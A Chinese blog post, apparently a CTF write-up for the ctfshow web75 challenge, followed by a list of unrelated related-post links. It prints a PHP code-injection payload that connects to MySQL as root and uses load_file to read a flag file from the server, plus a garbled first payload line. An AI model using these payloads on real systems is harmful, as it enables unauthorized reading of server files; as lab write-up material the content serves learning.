ctfshow web75
开启环境:
先直接用伪协议获取 flag 位置
c=?>__toString().’ ‘);} exit(0); ?>
c=try {$dbh = new PDO(‘mysql:host=localhost;dbname=ctftraining’, ‘root’, ‘root’);foreach($dbh->query(‘select load_file(“/flag36.txt”)’) as $row){echo($row[0]).”|”; }$dbh = null;}catch (PDOException $e) {echo $e->getMessage();exit(0);}exit(0);
try {
# 创建 PDO 实例, 连接 MySQL 数据库
$dbh = new PDO(‘mysql:host=localhost;dbname=ctftraining’, ‘root’, ‘root’);
# 在 MySQL 中,load_file(完整路径) 函数读取一个文件并将其内容作为字符串返回。
foreach($dbh->query(‘select load_file(“/flag36.txt”)’) as $row) {
echo($row[0]).”|”;
}
$dbh = null;
}
catch (PDOException $e) {
echo $e->getMessage();exit(0);
}
exit(0);
本文来自网络,不代表协通编程立场,如若转载,请注明出处:https://www.net2asp.com/b0c7558a2c.html
相关推荐
-
一文掌握SpringBoot注解之@Configuration知识文集(1)
🏆作者简介,普修罗双战士,一直追求不断学习和成长,在技术的道路上持续探索和实践。 🏆多年互联网行业从业经验,历任核心研发工程师,项目技术负责人。 &…
-
Flutter开发1:学习大纲
引言 欢迎来到Flutter开发系列的第一篇博客!在这个系列中,我们将一起探索Flutter的奇妙世界。如果你是一个热爱移动应用开发的开发者,或者对跨平台开发有兴趣,那么Flutt…
-
BUUCTF-Real-[PHP]XXE
目录 1、原理 2、XXE漏洞产生的原因 3、开始复现 paylaod 复现 4、flag 1、原理 XML数据在传输过程中,攻击者强制XML解析器去访问攻击者指定的资源内容(本地…
-
C++初阶入门之函数重载,引用以及一些新语法详细解析
个人主页:点我进入主页 专栏分类:C语言初阶 C语言进阶 数据结构初阶 Linux C++初阶 欢迎大家点赞,评论,收藏。 一起努力,一起奔赴大厂 目录 …
-
数据结构——并查集
1.并查集的定义 并查集其实也是一种树形结构,在使用中通常用森林的方式来表示 并查集的逻辑结构其实就是集合 并查集一般可以通过双亲写法(顺序结构)来完成,即通过一个数组存储父亲结点…
-
ElementUI组件:Button 按钮
ElementUI安装与使用指南 Button按钮 点击下载learnelementuispringboot项目源码 效果图 el-button.vue(Button 按钮)页面效…
-
如何从视频中提取高清图片?可以这样截取
如何从视频中提取高清图片?从视频中提取高清图片可以方便我们制作各种用途所需的素材,如海报、社交媒体配图等。此外,高清图片的细节和色彩也更丰富,可以更好地满足我们的视觉需求。从视频中…
-
jquery的9大选择器
1. 基本选择器 基本选择器是JQuery最常用的选择器,也是最简单的选择器,它通过元素id、class和标签名来查找DOM元素(在网页中id只能使用一次,class允许重复使用…
-
使用orangepi玩linux
最近看了这个大佬的文章,写了使用远程来挂载linux的方案,觉得还是很有意思的,瞬间感觉linux这块都还是相通的,就跑了一下,果然,牛逼! 香橙派全志H3烧录Uboot,远程加载…
-
《动手学深度学习(PyTorch版)》笔记4.6
注:书中对代码的讲解并不详细,本文对很多细节做了详细注释。另外,书上的源代码是在Jupyter Notebook上运行的,较为分散,本文将代码集中起来,并加以完善,全部用vscod…
![BUUCTF-Real-[PHP]XXE](/img/6a/7c5c184282fc45ab81d691d640210e37.png)
